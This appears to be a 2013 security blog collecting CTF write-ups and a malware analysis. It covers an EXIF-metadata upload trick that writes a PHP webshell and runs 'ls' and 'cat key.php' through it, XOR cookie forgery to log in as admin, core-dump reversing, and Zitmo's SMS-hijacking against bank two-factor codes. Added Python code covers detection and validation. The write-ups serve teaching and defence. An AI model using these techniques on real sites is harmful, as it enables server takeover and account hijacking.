Sunday, June 30, 2013

ForbiddenBITS CTF 2013 Write Up: Web 600 Imafreak

Imafreak

To practice for a wargame, I chose this problem from ForbiddenBITS CTF 2013 and rebuilt its environment. Although some details of the environment differ, the solution is identical.

Problem Description 

In this problem, a website is provided. It has two pages, view.php and upload.php.
A brief look at upload.php shows that the page contains a form for uploading an image file. With no parameters, view.php only shows the string "wrong id". There is also a hint: "Hint6[Freak]:~)".

Solution

First, following the hint, we can request view.php~ and read the source code. Source code can be found here.
The following piece of code is vulnerable:

<?php
// Strip '.', '/' and '\' from id so it cannot escape the upload directory
$_GET['id'] = str_replace(".", "", $_GET['id']);
$_GET['id'] = str_replace("/", "", $_GET['id']);
$_GET['id'] = str_replace("\\", "", $_GET['id']);
if (!empty($_GET['id']) && @file_exists('upload/'.$_GET['id'].'.jpg')) {
    $img = file_get_contents('upload/'.$_GET['id'].'.jpg');
    $notFound = "";
    // The camera model is taken from the EXIF IFD0 block and is never sanitized
    $exif_ifd0 = read_exif_data('upload/'.$_GET['id'].'.jpg', 'IFD0', 0);
    if (@array_key_exists('Model', $exif_ifd0)) {
        $camModel = $exif_ifd0['Model'];
    } else {
        $camModel = $notFound;
    }
    $imgx = 'upload/'.$_GET['id'].'.jpg';
    $imgHand = ImageCreateFromJPEG($imgx);
    $imgSize = GetImageSize($imgx);
    $imgWidth = $imgSize[0];
    $imgHeight = $imgSize[1];

    // Concatenate the red channel of every pixel, row by row, as raw bytes
    $dd = "";
    for ($l = 0; $l < $imgHeight; $l++) {
        for ($c = 0; $c < $imgWidth; $c++) {
            $pxlCor = ImageColorAt($imgHand, $c, $l);
            $pxlCorArr = ImageColorsForIndex($imgHand, $pxlCor);
            $dd .= chr($pxlCorArr["red"]);
        }
    }
    // The EXIF Model string becomes the tail of the output filename
    $filex = "secretstoreddata/"."secret".($camModel);
    $fp = fopen($filex, 'w');
    fwrite($fp, $dd);
    fclose($fp);
}
So this script reads the image from the upload directory and writes the red channel of every pixel, as raw bytes, into the secretstoreddata directory. The output filename ends with the EXIF Model string, which is never sanitized (only the id parameter is). If we can control both the file content and the file extension, we can write PHP code into that file and execute arbitrary code.

We start with the file extension, which comes from read_exif_data(). That function returns the EXIF headers of a JPEG file; EXIF holds metadata written by digital cameras, such as the camera model. Since EXIF data can be edited, we can set the Model tag with exiv2 and thereby control the file extension.

The file content can be constructed with an image library such as Python's PIL or PHP's image processing functions. Here we follow the program from this write-up, shown below.
<?php
// $shell holds the PHP payload to embed; its value was cut off in the page source
$shell = '...';
$width = strlen($shell);
// create a 1-pixel-high true color image, one pixel per payload byte
$img = imagecreatetruecolor($width, 1);
for ($x = 0; $x < $width; $x++) {
    // get ascii value of the payload byte
    $value = ord($shell[$x]);
    // set a grey pixel whose red channel equals that byte
    $color = imagecolorexact($img, $value, $value, $value);
    imagesetpixel($img, $x, 0, $color);
}
// save image using 100% quality to keep the pixel values (nearly) unchanged by compression
imagejpeg($img, 'imafreak.jpg', 100);
// add the Model metadata using the exiv2 tool, so the output filename ends in .php
system('src/exiv2 -M "add Exif.Image.Model .php" imafreak.jpg');
?>
After executing this PHP program, the JPEG file is generated. Then we request
http://140.113.216.151:10180/Imafreak/view.php?id=imafreak

Then we send a request to the generated PHP file, as follows:
http://140.113.216.151:10180/Imafreak/secretstoreddata/ea5d2f1c4608232e07d3aa3d998e5135.php?c=ls
We find a key.php file in the secretstoreddata directory, so we read that file and finally obtain the key:
http://140.113.216.151:10180/Imafreak/secretstoreddata/ea5d2f1c4608232e07d3aa3d998e5135.php?c=cat%20key.php
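The root cause is that view.php builds a filename from an EXIF field the uploader controls. The following added example (Python, not from the write-up or the challenge) extracts the IFD0 Model tag from a JPEG's APP1 segment, the same field read_exif_data() returned, and applies the whitelist check the vulnerable code lacks; the sample JPEG bytes are constructed inline.

```python
import re
import struct

MODEL_TAG = 0x0110  # EXIF IFD0 "Model" tag, the field view.php used in the filename
SAFE_MODEL = re.compile(r"[A-Za-z0-9 _-]{1,64}")  # no '.', '/', '\' or control bytes

def exif_model(jpeg):
    """Return the IFD0 Model string from a JPEG's APP1/Exif segment, or None."""
    if jpeg[:2] != b"\xff\xd8":
        return None
    pos = 2
    while pos + 4 <= len(jpeg) and jpeg[pos] == 0xFF:  # walk the marker segments
        marker = jpeg[pos + 1]
        seglen = struct.unpack(">H", jpeg[pos + 2:pos + 4])[0]
        seg = jpeg[pos + 4:pos + 2 + seglen]
        if marker == 0xE1 and seg.startswith(b"Exif\x00\x00"):
            return _ifd0_model(seg[6:])
        if marker == 0xDA:  # start of scan: no more metadata segments
            break
        pos += 2 + seglen
    return None

def _ifd0_model(tiff):
    e = "<" if tiff[:2] == b"II" else ">"  # TIFF byte order of the Exif block
    ifd = struct.unpack(e + "I", tiff[4:8])[0]
    count = struct.unpack(e + "H", tiff[ifd:ifd + 2])[0]
    for i in range(count):
        entry = tiff[ifd + 2 + 12 * i:ifd + 14 + 12 * i]
        if len(entry) < 12:
            break
        tag, typ, n, off = struct.unpack(e + "HHII", entry)
        if tag == MODEL_TAG and typ == 2:  # type 2 = ASCII; <=4 bytes are stored inline
            data = entry[8:8 + n] if n <= 4 else tiff[off:off + n]
            return data.rstrip(b"\x00").decode("ascii", "replace")
    return None

def model_is_safe(model):
    """Reject anything that could change a derived filename's extension or directory."""
    return model is not None and SAFE_MODEL.fullmatch(model) is not None

def build_exif_jpeg(model):
    """Constructed sample: minimal JPEG with one APP1 segment whose IFD0 holds Model."""
    value = model.encode("ascii") + b"\x00"
    assert len(value) > 4, "sample always stores the value out-of-line at offset 26"
    ifd = struct.pack("<H", 1) + struct.pack("<HHII", MODEL_TAG, 2, len(value), 26) + b"\x00" * 4
    app1 = b"Exif\x00\x00" + b"II*\x00" + struct.pack("<I", 8) + ifd + value
    return b"\xff\xd8\xff\xe1" + struct.pack(">H", len(app1) + 2) + app1 + b"\xff\xd9"

if __name__ == "__main__":
    for m in ("Canon EOS 5D", ".php", "../evil"):
        print(repr(exif_model(build_exif_jpeg(m))), "safe" if model_is_safe(m) else "UNSAFE")
```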

 

Note

On July 16, 2013, a technical blog post described malware that employs a similar technique:
http://blog.sucuri.net/2013/07/malware-hidden-inside-jpg-exif-headers.html

Sunday, June 23, 2013

Android Malware Zitmo Analysis

Zitmo

Zitmo is an Android bot that aims to steal the user's bank authentication tokens. What makes Zitmo interesting is its ability to defeat two-factor authentication.

To counter traditional banking trojans, online banking services employ transaction authentication numbers (TAN), a two-factor authentication mechanism, to authorize the user.

Zitmo is the mobile component of the Zeus bot, and it gives Zeus a way to defeat two-factor authentication.

In this two-factor scheme, the online bank first asks for the user's mobile number. After the user authenticates with the traditional password, a message containing a secondary password is sent to the user's mobile. Only a user holding both passwords can authenticate successfully and complete the transaction.

The following figure describes how Zitmo works:
First, Zeus infects the user's computer. Once the user connects to the online bank after infection, the connection is hijacked, and all of the user's input, including the phone number used for authentication, is sent to the bot server. The bot server then sends a forged message to the user's mobile asking them to install an app, which is in fact the Zitmo bot. Once the user installs this app, all messages are hijacked too, so the secondary password is sent to the bot server and the attacker is able to perform bank transactions.

Take a brief look into Zitmo.
In the manifest, we can observe the following sections.
Zitmo requests permission to receive and send messages.

Zitmo also registers a receiver that is triggered when the phone boots or reboots.

We can observe that Zitmo registers a receiver that intercepts messages with the highest priority (MAX INTEGER), so it can hijack the user's incoming messages.

The core part of Zitmo is shown in the following figure. When a message arrives, onReceive() is called, which calls snedSmsIfEnabled() to send the SMS to the attacker.
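As an added example (not from the analysis above), the following Python check applies the three manifest indicators discussed here to a decoded AndroidManifest.xml: the SMS permissions, a boot-completed receiver, and an SMS_RECEIVED receiver whose priority exceeds the documented app range. The sample manifest is constructed for illustration, not Zitmo's own.

```python
import xml.etree.ElementTree as ET

ANDROID = "{http://schemas.android.com/apk/res/android}"  # namespace of android:* attributes
SMS_RECEIVED = "android.provider.Telephony.SMS_RECEIVED"
BOOT_COMPLETED = "android.intent.action.BOOT_COMPLETED"
APP_PRIORITY_MAX = 1000  # documented upper bound for an app's intent-filter priority

# Constructed sample manifest carrying the three traits discussed above (not Zitmo's real one)
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.sample">
  <uses-permission android:name="android.permission.RECEIVE_SMS"/>
  <uses-permission android:name="android.permission.SEND_SMS"/>
  <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
  <application>
    <receiver android:name=".BootReceiver">
      <intent-filter>
        <action android:name="android.intent.action.BOOT_COMPLETED"/>
      </intent-filter>
    </receiver>
    <receiver android:name=".SmsReceiver">
      <intent-filter android:priority="2147483647">
        <action android:name="android.provider.Telephony.SMS_RECEIVED"/>
      </intent-filter>
    </receiver>
  </application>
</manifest>"""

def sms_interception_findings(manifest_xml):
    """Return a list of Zitmo-style traits found in a decoded AndroidManifest.xml."""
    root = ET.fromstring(manifest_xml)
    perms = {p.get(ANDROID + "name") for p in root.iter("uses-permission")}
    findings = []
    if {"android.permission.RECEIVE_SMS", "android.permission.SEND_SMS"} <= perms:
        findings.append("app can both receive and send SMS")
    for rcv in root.iter("receiver"):
        name = rcv.get(ANDROID + "name")
        for filt in rcv.iter("intent-filter"):
            actions = {a.get(ANDROID + "name") for a in filt.iter("action")}
            priority = int(filt.get(ANDROID + "priority", "0"))
            if BOOT_COMPLETED in actions:
                findings.append(f"{name} starts at boot")
            # A priority above the app range lets this receiver see SMS before the default app
            if SMS_RECEIVED in actions and priority > APP_PRIORITY_MAX:
                findings.append(f"{name} intercepts SMS at priority {priority}")
    return findings

if __name__ == "__main__":
    for finding in sms_interception_findings(SAMPLE_MANIFEST):
        print("-", finding)
```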


DEFCON 21 CTF Write Up: gnireengine 1

gnireengine 1: policebox

In this problem, we get two files: an executable named policebox and a core dump of policebox.
Examining the core dump, we found that it was generated a few instructions after the main function. Since we need some information about getchar(), there seemed to be no clue to continue.
We then used readelf to check what is inside the core file.
We noticed that a section named precord exists, which indicates that the core dump contains a program execution record logged by gdb's Process Record feature.
Therefore we first replay this record with gdb and disassemble the program. Function getchar() is located at 0x08048690, where we can set a breakpoint later.
After setting the breakpoint, we continue the replay. The program halts in getchar() and we can print the value of eax, which is the user's input.
Collecting all the input values reveals the key.
The key is: w0rlds.w0rst.k3yl0gger!


Wednesday, June 19, 2013

DEFCON 21 CTF Writeup: 3dub 1

3dub 1: badmedicine

In this problem, we only see a login form.

After we log in with some username, we get the "login successful" page,
but it says "the key is only for the admin".
If we try to log in as admin, the message "admin login disabled" is shown.
We then log in with another account and observe the web page's behaviour with Tamper Data.
With Tamper Data, we observe that a cookie named "username" is set.

After trying to log in with different usernames:
admin1 : 09c8259ca01f
admiN  : 09c8259c80
We find that most of the cookie bytes are the same and only differ slightly.
Therefore we can guess that the cookies are encrypted with the XOR operator.
Finally we can find the cookie for admin:
admin : 09c8259ca0
Then we change the value of the cookie and resend the page to get the key.
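Why the guess works: the cookie is the username XORed with a fixed keystream, so one known username/cookie pair reveals the key bytes and any other name can be encoded (a server-side session id or an HMAC-signed cookie would prevent this). The following is an added example, not from the write-up, that recovers the keystream from the two cookies above and reproduces the admin cookie:

```python
# Username/cookie pairs observed above (cookie = hex of username XOR keystream)
OBSERVED = {"admin1": "09c8259ca01f", "admiN": "09c8259c80"}

def recover_keystream(observed):
    """Derive the per-position key bytes from known username/cookie pairs.

    With a fixed keystream every pair must agree on each position; a
    disagreement means the scheme is something other than plain XOR."""
    key = {}
    for username, cookie in observed.items():
        for i, (p, c) in enumerate(zip(username.encode(), bytes.fromhex(cookie))):
            k = p ^ c
            if key.setdefault(i, k) != k:
                raise ValueError(f"position {i}: key byte differs between pairs")
    return bytes(key[i] for i in range(len(key)))

def encode_cookie(username, keystream):
    """Reproduce the server's cookie for any username no longer than the known keystream."""
    if len(username) > len(keystream):
        raise ValueError("username longer than the recovered keystream")
    return bytes(p ^ k for p, k in zip(username.encode(), keystream)).hex()

def decode_cookie(cookie, keystream):
    """Inverse of encode_cookie: XOR is its own inverse."""
    return bytes(c ^ k for c, k in zip(bytes.fromhex(cookie), keystream)).decode()

if __name__ == "__main__":
    ks = recover_keystream(OBSERVED)
    print("keystream:", ks.hex())                  # 68ac48f5ce2e
    print("admin ->", encode_cookie("admin", ks))  # 09c8259ca0, as found above
```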